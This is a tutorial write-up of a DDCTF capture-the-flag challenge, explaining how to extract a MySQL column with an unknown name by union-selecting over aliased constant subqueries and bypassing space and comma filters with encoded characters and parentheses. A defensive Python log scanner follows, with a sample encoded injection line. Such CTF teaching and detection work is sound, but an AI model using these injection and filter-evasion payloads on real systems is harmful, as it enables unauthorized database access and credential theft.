This article explains how MySQL queries can be made to work around unknown field names, with detailed sample code for reference and study. It has some reference value for anyone learning MySQL; follow along if you need it, and I hope it helps.
Preface
This article covers the fifth challenge of DDCTF, a technique for bypassing unknown field (column) names. I reproduced it on my own machine; the idea is neat and clear, so I would like to share it. Let's look at the details:
Implementation ideas
The challenge filters spaces and commas. For spaces, use %0a, %0b, %0c, %0d or %a0, or simply use parentheses; either bypasses the filter. Use join to bypass the comma.
The name of the field that stores the flag is unknown, and the challenge also filters information_schema.columns and the hex of the table name, so the field names cannot be looked up. In this case a union query can be used. The process is as follows:
The idea is to make the flag appear under the name of a known field.
Sample code:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
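As a defender-side complement, added here and not part of the original write-up, the following Python scanner normalises a query-string value the way the challenge's filter would need to (decoding the %0a/%0b/%0c/%0d/%a0 space substitutes and treating parentheses as separators) and flags the signals of the technique shown above: a union select, an aliased constant subquery such as (select 1)a, and a positional column reference such as e.4. The access-log format, the sample lines and the pattern names are my own assumptions.

```python
import re
from urllib.parse import unquote

# Space substitutes the write-up lists (%0a %0b %0c %0d %a0), plus tab.
SPACE_SUBSTITUTES = "\n\x0b\x0c\r\xa0\t"

# Signals of the positional-column technique; the names are my own (assumed) labels.
PATTERNS = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b"),
    "aliased-constant-subquery": re.compile(r"\bselect\s+\d+\s+[a-z_]\w*\b"),
    "positional-column-ref": re.compile(r"\b[a-z_]\w*\.\d+\b"),  # e.4; also hits "v1.2", so review hits
    "join-comma-bypass": re.compile(r"\bselect\b.*\bjoin\b"),
}

def normalize(value: str) -> str:
    """Percent-decode twice (double encoding), lower-case and canonicalise spacing."""
    text = unquote(unquote(value, encoding="latin-1"), encoding="latin-1").lower()
    # Parentheses can replace spaces entirely ("select(1)"), so treat them as separators.
    text = re.sub(r"[()]", " ", text)
    for ch in SPACE_SUBSTITUTES:
        text = text.replace(ch, " ")
    return re.sub(r"\s+", " ", text).strip()

def scan_value(value: str) -> list[str]:
    """Names of every pattern that fires on one decoded query-string value."""
    text = normalize(value)
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_log(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Scan each access-log line's query string; return (line no, parameter, signals) per hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group(1):
            continue
        for pair in m.group(1).split("?", 1)[1].split("&"):
            key, _, val = pair.partition("=")
            if found := scan_value(val):
                hits.append((n, key, found))
    return hits

# Constructed sample lines: two benign requests and one using the space/parenthesis substitutions.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /user.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /user.php?id=1%0aunion%a0select(e.4)from((select(1)a)e) HTTP/1.1" 200 734',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /user.php?id=2&page=3 HTTP/1.1" 200 498',
]
```

Calling scan_log(SAMPLE_LOG) reports only the second line, with all three positional-column signals; the positional pattern is deliberately broad, so treat hits as review candidates rather than verdicts.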
This concludes the detailed explanation of how MySQL queries can work around unknown field names. For more, follow other related articles on the PHP Chinese website!